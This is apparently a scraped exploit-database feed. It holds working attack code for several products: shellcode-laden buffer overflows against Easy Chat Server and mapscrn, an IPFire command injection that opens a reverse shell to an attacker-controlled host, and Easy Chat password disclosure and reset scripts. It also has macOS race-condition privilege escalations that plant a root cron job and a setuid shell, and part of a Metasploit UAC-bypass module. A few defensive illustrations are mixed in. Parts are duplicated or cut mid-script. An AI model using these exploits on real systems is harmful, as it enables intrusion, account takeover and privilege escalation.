    "\x4d\x32\x4c\x32\x50\x52\x56\x37\x4c\x4b\x31\x42\x42\x30\x4c"
    "\x4b\x31\x5a\x47\x4c\x4c\x4b\x30\x4c\x54\x51\x42\x58\x4a\x43"
    "\x47\x38\x35\x51\x48\x51\x36\x31\x4c\x4b\x46\x39\x37\x50\x55"
    "\x51\x49\x43\x4c\x4b\x50\x49\x35\x48\x4b\x53\x57\x4a\x37\x39"
    "\x4c\x4b\x50\x34\x4c\x4b\x53\x31\x38\x56\x56\x51\x4b\x4f\x4e"
    "\x4c\x49\x51\x38\x4f\x44\x4d\x53\x31\x39\x57\x37\x48\x4b\x50"
    "\x32\x55\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d\x31"
    "\x34\x43\x45\x5a\x44\x46\x38\x4c\x4b\x31\x48\x51\x34\x33\x31"
    "\x58\x53\x42\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x46\x38\x35"
    "\x4c\x35\x51\x4e\x33\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4e\x30"
    "\x4d\x59\x30\x44\x31\x34\x37\x54\x31\x4b\x51\x4b\x53\x51\x31"
    "\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x50\x5a"
    "\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x51\x4d\x55\x38\x46\x53\x36"
    "\x52\x35\x50\x55\x50\x45\x38\x32\x57\x32\x53\x30\x32\x51\x4f"
    "\x56\x34\x33\x58\x30\x4c\x32\x57\x56\x46\x44\x47\x4b\x4f\x58"
    "\x55\x4f\x48\x4c\x50\x35\x51\x43\x30\x43\x30\x37\x59\x4f\x34"
    "\x50\x54\x50\x50\x32\x48\x37\x59\x4b\x30\x32\x4b\x55\x50\x4b"
    "\x4f\x59\x45\x53\x5a\x33\x38\x50\x59\x50\x50\x5a\x42\x4b\x4d"
    "\x51\x50\x36\x30\x31\x50\x36\x30\x45\x38\x4b\x5a\x54\x4f\x39"
    "\x4f\x4b\x50\x4b\x4f\x38\x55\x4c\x57\x52\x48\x53\x32\x45\x50"
    "\x44\x51\x31\x4c\x4b\x39\x4b\x56\x52\x4a\x52\x30\x50\x56\x56"
    "\x37\x33\x58\x58\x42\x39\x4b\x46\x57\x55\x37\x4b\x4f\x39\x45"
    "\x51\x47\x43\x58\x4f\x47\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x59"
    "\x45\x51\x47\x42\x48\x54\x34\x5a\x4c\x57\x4b\x4b\x51\x4b\x4f"
    "\x48\x55\x30\x57\x5a\x37\x42\x48\x32\x55\x52\x4e\x30\x4d\x45"
    "\x31\x4b\x4f\x38\x55\x35\x38\x35\x33\x52\x4d\x45\x34\x45\x50"
    "\x4b\x39\x4d\x33\x56\x37\x31\x47\x56\x37\x46\x51\x5a\x56\x32"
    "\x4a\x44\x52\x56\x39\x31\x46\x5a\x42\x4b\x4d\x53\x56\x39\x57"
    "\x30\x44\x51\x34\x57\x4c\x35\x51\x33\x31\x4c\x4d\x37\x34\x57"
    "\x54\x32\x30\x58\x46\x35\x50\x51\x54\x50\x54\x30\x50\x31\x46"
    "\x51\x46\x36\x36\x31\x56\x36\x36\x30\x4e\x36\x36\x51\x46\x31"
    "\x43\x46\x36\x43\x58\x33\x49\x48\x4c\x47\x4f\x4b\x36\x4b\x4f"
    "\x58\x55\x4c\x49\x4d\x30\x30\x4e\x36\x36\x47\x36\x4b\x4f\x56"
    "\x50\x32\x48\x33\x38\x4c\x47\x35\x4d\x35\x30\x4b\x4f\x49\x45"
    "\x4f\x4b\x4a\x50\x48\x35\x59\x32\x50\x56\x52\x48\x4f\x56\x5a"
    "\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58\x55\x37\x4c\x53\x36\x33\x4c"
    "\x44\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x37"
    "\x37\x34\x53\x52\x52\x32\x4f\x53\x5a\x35\x50\x36\x33\x4b\x4f"
    "\x4e\x35\x41\x41")

magic = "B" * 217               # padding up to the SEH record
magic += "\xeb\x06\x90\x90"     # nSEH: short jump over the handler address
magic += "\xBC\x04\x01\x10"     # SEH: handler address
magic += shellcode
magic += "C" * 200

buffer = "POST /registresult.htm HTTP/1.1\r\n\r\n"
buffer += "Host: 192.168.1.11"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
buffer += "Accept-Language: en-US,en;q=0.5"
buffer += "Accept-Encoding: gzip, deflate"
buffer += "Referer: http://192.168.1.11/register.ghp"
buffer += "Connection: close"
buffer += "Content-Type: application/x-www-form-urlencoded"
buffer += "UserName=" + magic + "&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"

socket.send(buffer)
data = socket.recv(4096)
print data
socket.close()

IPFire 2.19 - Remote Code Execution

SecurityLab.ru - Mon, 2017-06-12 01:39
#
# Title : IPFire 2.19 Firewall Post-Auth RCE
# Date : 09/06/2017
# Author : 0x09AL (https://twitter.com/0x09AL)
# Tested on: IPFire 2.19 (x86_64) - Core Update 110
# Vendor : http://www.ipfire.org/
# Software : http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso
# Vulnerability Description:
# The file ids.cgi doesn't sanitize the OINKCODE parameter, which is passed to a system call that invokes wget.
# You need valid credentials to exploit this vulnerability, or you can exploit it through CSRF.
#
#

import requests

# Adjust the ip and ports.
revhost = '192.168.56.1'
revport = 1337
url = 'https://192.168.56.102:444/cgi-bin/ids.cgi'
username = 'admin'
password = 'admin'

payload = 'bash -i >& /dev/tcp/' + revhost + '/' + str(revport) + ' 0>&1'

evildata = {'ENABLE_SNORT_GREEN': 'on', 'ENABLE_SNORT': 'on', 'RULES': 'registered',
            'OINKCODE': '`id`', 'ACTION': 'Download new ruleset', 'ACTION2': 'snort'}

headers = {'Accept-Encoding': 'gzip, deflate, br',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
           'User-Agent': 'IPFIRE Exploit',
           'Referer': url,
           'Upgrade-Insecure-Requests': '1'}


def verifyVuln():
    # verify=False because the appliance certificate is usually self-signed.
    req = requests.post(url, data=evildata, headers=headers, auth=(username, password), verify=False)
    if req.status_code == 200 and "uid=99(nobody)" in req.text:
        print "[+] IPFire Installation is Vulnerable [+]"
        revShell()
    else:
        print "[+] Not Vulnerable [+]"


def revShell():
    evildata["OINKCODE"] = '`' + payload + '`'
    print "[+] Sending Malicious Payload [+]"
    req = requests.post(url, data=evildata, headers=headers, auth=(username, password), verify=False)


verifyVuln()
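The root cause named in the header is that a form parameter reaches a shell command line unvalidated. The added example below is not IPFire's ids.cgi (which is Perl); it shows, in Python, the two changes that close this class of bug: an allowlist check on the parameter's shape, and building the wget invocation as an argv list handed to execve rather than to /bin/sh. The oinkcode format (40 hex characters), the ruleset URL and the output path are assumptions made for the illustration.

```python
import re
import subprocess

# Assumption: a Snort oinkcode is exactly 40 hex characters. Anything else, including
# the backtick-wrapped commands used in the PoC above, fails this check.
OINKCODE_RE = re.compile(r"\A[0-9a-f]{40}\Z")
RULESET_URL = "https://rules.example.invalid/snortrules.tar.gz"  # placeholder, not a real feed
DEST = "/tmp/snortrules.tar.gz"                                  # placeholder download path


def validate_oinkcode(value):
    """Allowlist check: normalise and accept only the exact shape an oinkcode has."""
    value = value.strip().lower()
    if not OINKCODE_RE.match(value):
        raise ValueError("oinkcode must be exactly 40 hex characters")
    return value


def build_download_argv(oinkcode):
    """Return the wget command as an argv list.

    Because the list goes straight to execve() and never through a shell, shell
    metacharacters in the parameter would be passed to wget as literal bytes even
    if validation were missing; with validation they cannot get this far at all."""
    code = validate_oinkcode(oinkcode)
    return ["wget", "-q", "-O", DEST, RULESET_URL + "?oinkcode=" + code]


def download_ruleset(oinkcode, run=subprocess.run):
    """Run the download without a shell. `run` is injectable so the call path can
    be exercised offline; by default it is subprocess.run."""
    return run(build_download_argv(oinkcode), shell=False, check=True)


def handle_ids_form(form, run=subprocess.run):
    """Mimics the CGI's 'Download new ruleset' action: returns (ok, message) and
    never lets a malformed OINKCODE reach the command layer."""
    if form.get("ACTION") != "Download new ruleset":
        return False, "unsupported action"
    try:
        download_ruleset(form.get("OINKCODE", ""), run=run)
    except ValueError as exc:
        return False, str(exc)
    return True, "ruleset download started"


if __name__ == "__main__":
    # Constructed inputs; the dry-run runner just echoes argv instead of executing.
    dry = lambda argv, **kw: print("would exec:", argv)
    print(handle_ids_form({"ACTION": "Download new ruleset", "OINKCODE": "0123456789abcdef0123456789abcdef01234567"}, run=dry))
    print(handle_ids_form({"ACTION": "Download new ruleset", "OINKCODE": "`id`"}, run=dry))
```

The same two rules carry over to the Perl original: validate against `^[0-9a-f]{40}$` before use, and call `system()` with a list of arguments rather than a single interpolated string.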

EFS Easy Chat Server 3.1 - Password Disclosure

SecurityLab.ru - Mon, 2017-06-12 01:35
# Exploit Title: Easy Chat Server Remote Password Disclosure
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Disclosure
# Severity: Critical
# =========================================================================================================
# Registration page 'register.ghp' allows disclosing ANY user's password.
# Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password.
# =========================================================================================================
# USAGE: python exploit.py ip username

#!/usr/bin/python
import urllib
import re
import requests
import sys

ip = sys.argv[1]
username = sys.argv[2]

url = 'http://' + ip + '/register.ghp?username=' + username + '&password='
response = requests.get(url)
html = response.content

pattern = ''  # regular expression that picks the password field out of the returned page
result = re.compile(pattern)
password = re.findall(result, html)
x = ''.join(password)
password = x.replace("[", "")
password = password.replace("]", "")
print "Password: " + password

EFS Easy Chat Server 3.1 - Password Reset

SecurityLab.ru - Mon, 2017-06-12 01:34
# Exploit Title: Easy Chat Server Remote Password Reset
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Pre-Auth Remote Password Reset
# Severity: Critical
# ====================================================================================================
# Registration page 'register.ghp' allows resetting ANY user's password.
# Remote un-authenticated attackers can send HTTP POST requests to Hijack ANY Easy Chat Server account.
# ====================================================================================================
# USAGE: python exploit.py ip port username password

#!/usr/bin/python
import os, sys, socket

ip = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.connect((ip, 80))

buffer = "POST /registresult.htm HTTP/1.1"
buffer += "Host: 192.168.1.11"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
buffer += "Accept-Language: en-US,en;q=0.5"
buffer += "Accept-Encoding: gzip, deflate"
buffer += "Connection: close"
buffer += "Content-Type: application/x-www-form-urlencoded"
buffer += "UserName=" + username + "&Password=" + password + "&Password1=ggg&Sex=0&Email=%25252540&Icon=image17.gif&Resume=aaa&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change"

socket.send(buffer)
socket.close()
print "[#] Password Changed Successfully"

Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition

SecurityLab.ru - Mon, 2017-06-12 01:32
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1223

One way processes in userspace that offer mach services check whether they should perform an action on behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement.

These decisions are made using the audit token which is appended by the kernel to every received mach message. The audit token contains, amongst other things, the sender's uid, gid, ruid, guid, pid and pid generation number (p_idversion).

The canonical way in which userspace daemons check a message sender's entitlements is as follows:

  audit_token_t tok;
  xpc_connection_get_audit_token(conn, &tok);
  SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok);
  CFErrorRef err;
  CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err);
  // continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue

The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number, to build the SecTaskRef:

  SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token)
  {
      SecTaskRef task;

      task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token));
      ...

This leaves two avenues for a sender without an entitlement to talk to a service which requires it:

a) If the process can exec binaries then it can simply send the message, then exec a system binary with that entitlement. This pid now maps to the entitlements of that new binary.

b) If the process can't exec a binary (it's in a sandbox, for example) then exploitation is still possible if the process has the ability to crash and force the restart of a binary with that entitlement (a common case, e.g. via an OOM or NULL pointer deref in a mach service).

The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap the next free pid around, such that when it sends the request to the target and then forces the entitled process to crash, it can crash itself and have its pid reused by the respawned entitled process.

Scenario b) is not so outlandish; such a setup could be achieved via a renderer bug with the ability to gain code execution in new renderer processes as they are created.

You would also not necessarily be restricted to just being able to send one mach message to the target service, as there's no constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with another process or launchd so that you can still engage in full bi-directional communication with the target service even if the audit token was always checked.

The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables you to talk to a far greater range of services, as many system services use entitlement checks to restrict their clients to a small number of whitelisted binaries. This may also open up access to privileged information which is protected by the entitlements.

This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access" entitlement and pass the check without having that entitlement.

We'll target com.apple.corecaptured, which expects that only the cctool or sharingd binaries can talk to it.

Use an lldb invocation like:

  sudo lldb -w -n corecaptured

then run this PoC and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library. You'll notice that the check passes and our xpc message has been received and will now be processed by the daemon.
Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand we could ensure the target service has many messages in its mach port queue to make the race more winnable. PoC tested on MacOS 10.12.3 (16D32) */ // ianbeer #if 0 MacOS/iOS userspace entitlement checking is racy One way processes in userspace that offer mach services check whether they should perform an action on behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement. These decisions are made using the audit token which is appended by the kernel to every received mach message. The audit token contains amongst other things the senders uid, gid, ruid, guid, pid and pid generation number (p_idversion.) The canonical way which userspace daemons check a message sender's entitlements is as follows: audit_token_t tok; xpc_connection_get_audit_token(conn, &tok); SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok); CFErrorRef err; CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err); /* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */ The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number to build the SecTaskRef: SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token) { SecTaskRef task; task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token)); ... This leaves two avenues for a sender without an entitlement to talk to a service which requires it: a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement. This pid now maps to the entitlements of that new binary. 
b) If the process can't exec a binary (it's in a sandbox for example) then exploitation is still possible if the processes has the ability to crash and force the restart of a binary with that entitlement (a common case, eg via an OOM or NULL pointer deref in a mach service.) The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap the next free pid around such that when it sends the request to the target then forces the entitled process to crash it can crash itself and have its pid reused by the respawned entitled process. Scenario b) is not so outlandish, such a setup could be achieved via a renderer bug with ability to gain code execution in new renderer processes as they are created. You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with another process or launchd so that you can still engage in a full bi-directional communication with the target service even if the audit token was always checked. The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number of whitelisted binaries. This may also open up access to privileged information which is protected by the entitlements. This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access" entitlement and pass the check without having that entitlement. We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it. 
use an lldb invocation like: sudo lldb -w -n corecaptured then run this poc and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library. You'll notice that the check passes and our xpc message has been received and will now be processes by the daemon. Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand we could ensure the target service has many messages in its mach port queue to make the race more winnable. PoC tested on MacOS 10.12.3 (16D32) #endif #include #include #include #include #include void exec_blocking(char* target, char** argv, char** envp) { // create the pipe int pipefds[2]; pipe(pipefds); int read_end = pipefds[0]; int write_end = pipefds[1]; // make the pipe nonblocking so we can fill it int flags = fcntl(write_end, F_GETFL); flags |= O_NONBLOCK; fcntl(write_end, F_SETFL, flags); // fill up the write end int ret, count = 0; do { char ch = ' '; ret = write(write_end, &ch, 1); count++; } while (!(ret == -1 && errno == EAGAIN)); printf("wrote %d bytes to pipe buffer\n", count-1); // make it blocking again flags = fcntl(write_end, F_GETFL); flags &= ~O_NONBLOCK; fcntl(write_end, F_SETFL, flags); // set the pipe write end to stdout/stderr dup2(write_end, 1); dup2(write_end, 2); execve(target, argv, envp); } xpc_connection_t connect(char* service_name){ xpc_connection_t conn = xpc_connection_create_mach_service(service_name, NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); xpc_connection_set_event_handler(conn, ^(xpc_object_t event) { xpc_type_t t = xpc_get_type(event); if (t == XPC_TYPE_ERROR){ printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION)); } printf("received an event\n"); }); xpc_connection_resume(conn); return conn; } int main(int argc, char** argv, char** envp) { xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_string(msg, "CCConfig", "hello from a sender without 
entitlements!"); xpc_connection_t conn = connect("com.apple.corecaptured"); xpc_connection_send_message(conn, msg); // exec a binary with the entitlement to talk to that daemon // make sure it doesn't exit by giving it a full pipe for stdout/stderr char* target_binary = "/System/Library/PrivateFrameworks/CoreCaptureControl.framework/Versions/A/Resources/cctool"; char* target_argv[] = {target_binary, NULL}; exec_blocking(target_binary, target_argv, envp); return 0; }
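The pid-reuse race described in scenario b), as an added example that is not part of the Project Zero issue or its PoC. It is a constructed toy model, not macOS code: a tiny pid allocator with wrap-around (PID_MAX, the process table size and the process roles are assumptions chosen so the wrap takes a few dozen iterations) plays out the crash-and-respawn loop, then evaluates the queued message's audit token two ways, the way SecTaskCreateWithAuditToken did it (pid only) and with the pid generation number included. The entitlement string is the one the PoC targets.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Constructed toy model of the kernel's pid allocator and process table.
   PID_MAX is tiny so the wrap-around happens in a few iterations; on a real
   system the attacker has to force thousands of respawns instead. */
#define PID_MAX 64
#define NPROC 4
#define ENTITLEMENT "com.apple.corecapture.manager-access"

struct proc { bool alive; int pid; int idversion; const char *entitlement; };
struct audit_token { int pid; int idversion; };   /* the two token fields that matter here */
struct ptab { struct proc p[NPROC]; int next_pid; int next_idversion; };

static struct proc *find_alive(struct ptab *t, int pid) {
    for (int i = 0; i < NPROC; i++)
        if (t->p[i].alive && t->p[i].pid == pid) return &t->p[i];
    return NULL;
}

/* Next pid the allocator would hand out, walking upward and wrapping. A pid
   equal to ignore_pid counts as free (its owner is about to crash), which is
   how the attacker "peeks" at where the cursor is. */
static int next_free_pid(struct ptab *t, int ignore_pid) {
    int pid = t->next_pid;
    for (int i = 0; i < PID_MAX; i++, pid = (pid + 1) % PID_MAX) {
        if (pid == 0) continue;
        struct proc *p = find_alive(t, pid);
        if (!p || p->pid == ignore_pid) return pid;
    }
    return -1;
}

static struct proc *spawn(struct ptab *t, const char *entitlement) {
    int pid = next_free_pid(t, -1);
    t->next_pid = (pid + 1) % PID_MAX;
    for (int i = 0; i < NPROC; i++) {
        if (!t->p[i].alive) {
            t->p[i] = (struct proc){ true, pid, t->next_idversion++, entitlement };
            return &t->p[i];
        }
    }
    return NULL;
}

static void crash(struct proc *p) { p->alive = false; }

/* What SecTaskCreateWithAuditToken effectively did: resolve the pid only. */
bool check_by_pid(struct ptab *t, struct audit_token tok, const char *ent) {
    struct proc *p = find_alive(t, tok.pid);
    return p && p->entitlement && strcmp(p->entitlement, ent) == 0;
}

/* The check the token allows: pid AND pid generation number must both match. */
bool check_by_token(struct ptab *t, struct audit_token tok, const char *ent) {
    struct proc *p = find_alive(t, tok.pid);
    return p && p->idversion == tok.idversion
             && p->entitlement && strcmp(p->entitlement, ent) == 0;
}

/* Scenario b) from the write-up. Returns the verdict the daemon reaches when
   it finally dequeues the attacker's message. */
bool simulate_pid_reuse(bool use_idversion) {
    struct ptab t = { .next_pid = 1, .next_idversion = 1 };
    spawn(&t, NULL);                                   /* long-lived target daemon */
    struct proc *attacker = spawn(&t, NULL);           /* sandboxed, no entitlement */
    struct proc *entitled = spawn(&t, ENTITLEMENT);    /* crashable entitled client */

    /* The kernel stamps the sender's identity at send time; the daemon only
       looks at it later, when it dequeues the message. */
    struct audit_token tok = { attacker->pid, attacker->idversion };

    /* Crash and respawn the entitled process until the allocator cursor would
       hand out our own pid to the next spawn once we are dead. */
    for (int spins = 0; next_free_pid(&t, attacker->pid) != tok.pid; spins++) {
        if (spins > 2 * PID_MAX) return false;         /* cannot happen in the model */
        crash(entitled);
        entitled = spawn(&t, ENTITLEMENT);
    }
    crash(entitled);
    crash(attacker);
    entitled = spawn(&t, ENTITLEMENT);                 /* respawns as our old pid */
    printf("entitled process respawned as pid %d (token: pid %d idversion %d, now idversion %d)\n",
           entitled->pid, tok.pid, tok.idversion, entitled->idversion);

    return use_idversion ? check_by_token(&t, tok, ENTITLEMENT)
                         : check_by_pid(&t, tok, ENTITLEMENT);
}

int main(void) {
    printf("pid-only check accepts the message: %s\n", simulate_pid_reuse(false) ? "yes" : "no");
    printf("pid+idversion check accepts it:     %s\n", simulate_pid_reuse(true) ? "yes" : "no");
    return 0;
}
```

The pid-only check passes because, by the time the message is dequeued, the pid in the token belongs to the respawned entitled process; the generation number is what distinguishes the attacker's dead instance from its successor, which is why the token carries it.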
Categories: Exploits

Apple macOS - Disk Arbitration Daemon Race Condition

SecurityLab.ru - Mon, 2017-06-12 01:32
#!/bin/bash
# Sources:
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc

if ! security authorize system.volume.internal.mount &>/dev/null; then
  echo >&2 "Cannot acquire system.volume.internal.mount right. This will not work."
  exit 1
fi

TARGET=/private/var/at
SUBDIR=tabs
DISK=/dev/disk0s1
TMPDIR=/tmp/pwn

mkdir -p $TMPDIR
cd $TMPDIR

cat << EOF > boom.c
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char ** argv) {
  assert(argc == 2);
  setuid(0);
  setgid(0);
  system(argv[1]);
  return 0;
}
EOF

clang boom.c -o _boom || exit 1

race_link() {
  mkdir -p mounts
  while true; do
    ln -snf mounts link
    ln -snf $TARGET link
  done
}

race_mount() {
  while ! df -h | grep $TARGET >/dev/null; do
    while df -h | grep $DISK >/dev/null; do
      diskutil umount $DISK &>/dev/null
    done
    while ! df -h | grep $DISK >/dev/null; do
      diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
    done
  done
}

cleanup() {
  echo "Killing child process $PID and cleaning up tmp dir"
  kill -9 $PID
  rm -rf $TMPDIR
}

if df -h | grep $DISK >/dev/null; then
  echo >&2 "$DISK already mounted. Exiting."
  exit 1
fi

race_link &
PID=$!
trap cleanup EXIT

echo "Just imagine having that root shell. It's gonna be legen..."
race_mount
echo "wait for it..."

CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
rm -f /var/at/tabs/root
echo "* * * * *" "$CMD" > /var/at/tabs/root

while ! [ -e $TMPDIR/boom ]; do
  sleep 1
done

echo "dary!"
kill -9 $PID
sleep 0.1

$TMPDIR/boom "rm /var/at/tabs/root"
$TMPDIR/boom "umount -f $DISK"
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"

Mapscrn 2.03 - Local Buffer Overflow

SecurityLab.ru - Mon, 2017-06-12 01:30
# Developed using Exploit Pack - http://exploitpack.com -
# Tested on: GNU/Linux - Kali 2017.1 Release
#
# Description: Mapscrn ( Part of setfont ) 2.0.3
# The mapscrn command loads a user defined output character mapping table into the console driver.
# The console driver may be later put into use user-defined mapping table mode by outputting a special
# escape sequence to the console device.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Architecture: all
#
# Vendor homepage: http://ccross.msk.su
#
# Source and destination overlap in strcpy(0xbe95fc4c, 0xbe9610df)
#    at 0x4831518: strcpy (vg_replace_strmem.c:506)
#    by 0x10A71F: ??? (in /usr/bin/mapscrn)
#    by 0x10933B: ??? (in /usr/bin/mapscrn)
#    by 0x41414140: ???
#
# Invalid read of size 2
#    at 0x488DFCA: getenv (getenv.c:84)
#    by 0x48867AE: guess_category_value (dcigettext.c:1587)
#    by 0x48867AE: __dcigettext (dcigettext.c:667)
#    by 0x48855F5: dcgettext (dcgettext.c:47)
#    by 0x109733: ??? (in /usr/bin/mapscrn)
#    by 0x41414140: ???
#  Address 0x41414141 is not stack'd, malloc'd or (recently) free'd
#
# Process terminating with default action of signal 11 (SIGSEGV)
#  Access not within mapped region at address 0x41414141
#    at 0x488DFCA: getenv (getenv.c:84)
#    by 0x48867AE: guess_category_value (dcigettext.c:1587)
#    by 0x48867AE: __dcigettext (dcigettext.c:667)
#    by 0x48855F5: dcgettext (dcgettext.c:47)
#    by 0x109733: ??? (in /usr/bin/mapscrn)
#    by 0x41414140: ???

import os, errno, subprocess

junk = "\x41" * 4880   # junk to offset
nops = "\x90" * 24     # nops
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
esp = "\xe0\xdf\xff\xbf"   # Must be changed
buffer = junk + esp + nops + shellcode   # Craft the buffer

try:
    print("[*] Mapscrn Stack-Based Buffer Overflow by Juan Sacco")
    print("[*] Please wait.. running")
    subprocess.call(["mapscrn", buffer])
except OSError as e:
    if e.errno == errno.ENOENT:
        print("Mapscrn not found!")
    else:
        print("Error executing exploit")
        raise

Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)

SecurityLab.ru - Fri, 2017-06-09 01:02
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::Windows::Priv
  include Post::Windows::Registry
  include Post::Windows::Runas

  FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze
  FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
  EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
  EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
  EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
  FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe".freeze
  CMD_MAX_LEN = 16383

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)',
        'Description' => %q{
          This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
          the current user hive, and inserting a custom command that will get invoked when the
          Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC
          flag turned off.

          This module modifies a registry key, but cleans up the key once the payload has been invoked.

          The module does not require the architecture of the payload to match the OS. If
          specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a
          separate process.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'winscriptingblog', # UAC bypass discovery and research
          'amaloteaux', # MSF module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],
        'DefaultTarget' => 0,
        'References' => [
          [ 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/' ],
          [ 'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1' ]
        ],
        'DisclosureDate' => 'May 12 2017'
      )
    )
  end

  def check
    if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    commspec = '%COMSPEC%'
    registry_view = REGISTRY_VIEW_NATIVE
    psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"

    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] == ARCH_X64
      if session.arch == ARCH_X86
        # fodhelper.exe is x64 only exe
        commspec = '%WINDIR%\\Sysnative\\cmd.exe'
        if target_arch.first == ARCH_X64
          # We can't use absolute path here as
          # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
          psh_path = "powershell.exe"
        end
      end
      if target_arch.first == ARCH_X86
        # Invoking x86, so switch to SysWOW64
